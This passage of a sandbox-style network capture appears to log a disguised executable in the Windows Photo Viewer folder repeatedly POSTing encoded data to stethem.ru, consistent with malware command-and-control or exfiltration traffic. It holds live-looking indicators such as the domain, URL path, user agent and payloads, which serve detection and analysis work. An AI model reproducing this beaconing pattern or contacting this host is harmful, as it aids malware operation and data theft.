Dec 28, 2024 22:19:42.578838110 CET	1072	OUT	Data Raw: 5a 5f 58 54 5b 40 51 50 5c 57 57 56 5a 54 54 5b 55 51 59 5f 55 52 57 59 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: Z_XT[@QP\WWVZTT[UQY_URWYZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X:> <+>&/8'7 </*,'+"2\1560-<![",\-
Dec 28, 2024 22:19:43.355341911 CET	25	IN	HTTP/1.1 100 Continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	49872	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:19:43.402750015 CET	323	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1788 Expect: 100-continue Connection: Keep-Alive
Dec 28, 2024 22:19:43.756568909 CET	1788	OUT	Data Raw: 5f 5e 58 52 5b 44 54 54 5c 57 57 56 5a 59 54 51 55 57 59 5d 55 51 57 5d 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: _^XR[DTT\WWVZYTQUWY]UQW]ZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X:=3=.&<;$$ 9(;*<3-!3&%5$(Y8![",\-2
Dec 28, 2024 22:19:44.487809896 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:19:44.732793093 CET	943	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:19:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xFqqWAZ%2F7BVOEQS238xJOxj4zSVfIvdsdWqLXza68%2FQGIZVZM7tRgXPTvf827zIrIxfvLZOzm2z%2BA168UATC4mg7qEq30vlTFwkFNuzMHSh%2Bz43YOgbek5zPU58l"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f94971e1dad7c6a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4164&min_rtt=1939&rtt_var=5177&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2111&delivery_rate=73961&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 0c 13 21 09 34 1b 32 54 36 0a 2a 0a 30 3a 3d 09 28 34 24 05 3c 30 21 12 26 39 3c 1f 2a 23 2c 55 24 07 31 02 26 2d 21 0c 24 12 22 1c 24 39 28 51 06 12 22 1c 21 06 38 0b 2e 14 3f 1a 27 23 3e 42 22 2e 2a 02 27 2a 22 0c 27 38 0b 12 35 00 3b 57 3b 5c 35 52 3e 07 01 19 28 31 31 07 37 01 2e 57 02 13 24 0e 3f 3d 24 0e 21 21 16 00 30 38 0d 5e 36 3f 0c 0c 27 29 36 1e 37 3d 0d 5e 3e 02 27 05 23 0e 38 0e 2a 29 23 12 34 01 24 12 28 39 22 55 2d 0e 2e 56 0f 35 56 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 98!42T60:=(4$<0!&9<#,U$1&-!$"$9(Q"!8.?'#>B".'"'85;W;\5R>(117.W$?=$!!08^6?')67=^>'#8*)#4$(9"U-.V5VT0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	49873	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:19:43.524216890 CET	323	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue Connection: Keep-Alive
Dec 28, 2024 22:19:43.875773907 CET	1072	OUT	Data Raw: 5f 5f 5d 54 5b 43 54 50 5c 57 57 56 5a 5e 54 50 55 52 59 5b 55 54 57 5a 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: __]T[CTP\WWVZ^TPURY[UTWZZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X:*?X>%''Z4\.9&=V!5%5:B0+=8,![",\-.
Dec 28, 2024 22:19:44.654896975 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:19:44.903358936 CET	796	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:19:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YMdXutZTfmToKlcGgYLYsc6mVheVzExRDrWUX%2B%2F3u0jEhU%2BLIwVBNleWGIjgCkhxWQKFf1%2BpWm02Fx60eVCRF319Cr04t21YAnbUfbHKzFP3Kmf%2FBdZuJOol3857"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f94971f284b43dd-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4383&min_rtt=1532&rtt_var=6277&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1395&delivery_rate=59973&cwnd=195&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3e 5b 5b 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4>[[X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	49878	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:19:45.155358076 CET	299	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue
Dec 28, 2024 22:19:45.500721931 CET	1072	OUT	Data Raw: 5a 52 58 56 5e 40 51 57 5c 57 57 56 5a 59 54 5a 55 51 59 58 55 50 57 5a 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: ZRXV^@QW\WWVZYTZUQYXUPWZZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X9Y)?<->&,<^$3Z#8.) 3-8!0)&C:38^/![",\-2
Dec 28, 2024 22:19:46.331831932 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:19:46.870055914 CET	801	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:19:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bLA1jeUzobB%2FSZtw8rCvKKsn%2FOC%2BOnQTp8T2u%2FnzpyYP46XBDTlhT0K1oUmm6%2B0UOvziiX%2BtkeNVSqu45HiEJYtSJ5aec2S%2Bye13VYasAGENR0c2lCD4Xhwp50NN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f94972988ea42ea-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3121&min_rtt=1732&rtt_var=3428&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1371&delivery_rate=113645&cwnd=142&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3e 5b 5b 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4>[[X0
Dec 28, 2024 22:19:46.870229959 CET	801	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:19:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bLA1jeUzobB%2FSZtw8rCvKKsn%2FOC%2BOnQTp8T2u%2FnzpyYP46XBDTlhT0K1oUmm6%2B0UOvziiX%2BtkeNVSqu45HiEJYtSJ5aec2S%2Bye13VYasAGENR0c2lCD4Xhwp50NN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f94972988ea42ea-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3121&min_rtt=1732&rtt_var=3428&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1371&delivery_rate=113645&cwnd=142&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3e 5b 5b 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4>[[X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	49884	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:19:47.585906029 CET	299	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue
Dec 28, 2024 22:19:47.938194036 CET	1072	OUT	Data Raw: 5f 5f 58 57 5e 40 51 57 5c 57 57 56 5a 5f 54 52 55 56 59 5b 55 56 57 5a 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: __XW^@QW\WWVZ_TRUVY[UVWZZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X:U<_+5X&7$B74_+_.)([0[8S"3.^15$;![",\-*
Dec 28, 2024 22:19:48.669470072 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:19:48.907744884 CET	791	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:19:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kvTLmgOffmaXaeT2qfh1MRcGoq3cHoOKi5jXaUZE3ErVgbRXs6S1h3HClfwkEj1dGQxtuEUX4NdWTp%2BvhyUcoyYrvmXpNGSJ5rnGoseYM%2F0uUha5P2jXV0ourdNy"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9497383bec1881-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=8355&min_rtt=1482&rtt_var=14303&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1371&delivery_rate=25853&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3e 5b 5b 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4>[[X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	49886	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:19:49.151782036 CET	299	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue
Dec 28, 2024 22:19:49.502111912 CET	1072	OUT	Data Raw: 5a 59 58 5d 5e 43 51 55 5c 57 57 56 5a 55 54 53 55 54 59 5b 55 50 57 58 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: ZYX]^CQU\WWVZUTSUTY[UPWXZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X9Y+03==*&8Z0?\#97\80X3$Q636%6:B%8Y,<![",\-
Dec 28, 2024 22:19:50.234761953 CET	25	IN	HTTP/1.1 100 Continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	49892	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:19:50.335664988 CET	323	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1788 Expect: 100-continue Connection: Keep-Alive
Dec 28, 2024 22:19:50.688330889 CET	1788	OUT	Data Raw: 5a 53 58 55 5e 41 54 57 5c 57 57 56 5a 58 54 50 55 54 59 5d 55 5d 57 5a 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: ZSXU^ATW\WWVZXTPUTY]U]WZZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X9Y>3#=-=2$_0B+ 9?/_/'[/551%60!X,![",\-6
Dec 28, 2024 22:19:51.466079950 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:19:51.713170052 CET	941	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:19:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BKusOD2sujLsTcb212kH%2BsU9g7OPdQAi3UCHcnTMnbkPH2s5g5nqEyROU6omOLvpt67%2FtDHCzN7z19yBD3FEKgjYRSB9r0VahXFiuM4ZnECLb%2FxNx3kao8E9jokE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f949749bb0f4343-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4595&min_rtt=1604&rtt_var=6583&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2111&delivery_rate=57180&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 0c 13 22 12 22 26 2a 56 21 33 29 55 27 07 0f 0f 3c 09 0d 5b 28 1e 03 13 24 39 37 0d 2a 0d 0d 08 27 07 22 5e 33 2d 21 09 30 05 3a 1c 31 39 28 51 06 12 21 0b 21 11 33 52 39 2a 02 05 30 20 2e 08 22 3d 35 58 33 17 25 54 25 01 35 5a 22 39 3f 57 3b 03 22 0b 3e 07 37 1e 2a 31 25 01 23 3b 2e 57 02 13 27 52 3c 3d 37 1e 35 21 37 5a 30 28 28 06 21 2c 25 54 26 29 26 56 23 3d 20 07 29 2c 20 5d 20 09 0d 52 3d 3a 27 10 34 28 3f 0e 2b 03 22 55 2d 0e 2e 56 0f 35 56 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 98""&V!3)U'<[($97'"^3-!0:19(Q!!3R90 ."=5X3%T%5Z"9?W;">71%#;.W'R<=75!7Z0((!,%T&)&V#= ), ] R=:'4(?+"U-.V5VT0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.4	49893	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:19:50.556595087 CET	323	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue Connection: Keep-Alive
Dec 28, 2024 22:19:50.907619953 CET	1072	OUT	Data Raw: 5f 5b 5d 50 5e 45 51 52 5c 57 57 56 5a 55 54 50 55 50 59 5b 55 56 57 5d 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: _[]P^EQR\WWVZUTPUPY[UVW]ZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X:=3(]+6&,8[$3\4$;0&./66]2%"@%(9X,,![",\-
Dec 28, 2024 22:19:51.687890053 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:19:51.933137894 CET	788	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:19:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lnW7joK6VlpjG23xfeZ77PCS9r4zw6OGMBYyI17GIX3oMYOJPBj0X2UMCSLAcm0tGvCuHyRt5ak5mCH5urTEPrk5WiYeKgvH8K%2BLYgdQKON7ZDxE2cJynQqUqyOs"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f94974b1de11a24-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4701&min_rtt=2094&rtt_var=5999&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1395&delivery_rate=63611&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3e 5b 5b 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4>[[X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	49898	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:19:52.327507973 CET	299	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue
Dec 28, 2024 22:19:52.713556051 CET	1072	OUT	Data Raw: 5a 5d 58 5c 5e 43 51 57 5c 57 57 56 5a 54 54 53 55 5b 59 58 55 52 57 59 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: Z]X\^CQW\WWVZTTSU[YXURWYZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X:)3<!&<4&7<#9(,9Z0="-2')Y8,![",\-
Dec 28, 2024 22:19:53.411609888 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:19:53.650232077 CET	794	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:19:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DqysdQ%2FFRflmwS7j55PlIhFF%2FLtqytjUbuOVH7UPmBh1qP323od3bkVv6UIB%2Br2caY5WexJqm2g77Z%2FLGkQadN7Ze8ggcyUD95UvXLkrDS2SqPylOHVGp2zkj5sZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f949755ddbd5e6d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3569&min_rtt=1533&rtt_var=4647&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1371&delivery_rate=81916&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3e 5b 5b 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4>[[X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	49902	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:19:53.901196957 CET	323	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1064 Expect: 100-continue Connection: Keep-Alive
Dec 28, 2024 22:19:54.251189947 CET	1064	OUT	Data Raw: 5a 58 5d 53 5e 43 51 51 5c 57 57 56 5a 5d 54 52 55 57 59 5b 55 50 57 53 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: ZX]S^CQQ\WWVZ]TRUWY[UPWSZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X9^*#?-[&Z70$Z7)3;) [$!06%>0%]/![",\-&
Dec 28, 2024 22:19:54.985198021 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:19:55.225785971 CET	792	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:19:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vmBOmKkh1qQM%2BApqvywFcWfJmhx0kuRjKs8BNO8UEZjRcvro05nUUo6aCJb9fvN%2FYNfCnn04DYJn1pejVgGaxO91AFCXUmI6IPktIDLMgMOIhrzGnCrSK8ZhPGE%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f94975fbb850f9d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4239&min_rtt=1671&rtt_var=5764&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1387&delivery_rate=65706&cwnd=192&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3e 5b 5b 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4>[[X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.4	49911	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:19:56.841443062 CET	323	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1752 Expect: 100-continue Connection: Keep-Alive
Dec 28, 2024 22:19:57.188286066 CET	1752	OUT	Data Raw: 5a 58 58 57 5e 48 51 55 5c 57 57 56 5a 5d 54 54 55 53 59 5b 55 51 57 5b 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: ZXXW^HQU\WWVZ]TTUSY[UQW[ZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X:*07+"&<0_0',70/33?53:]&5$^)8![",\-
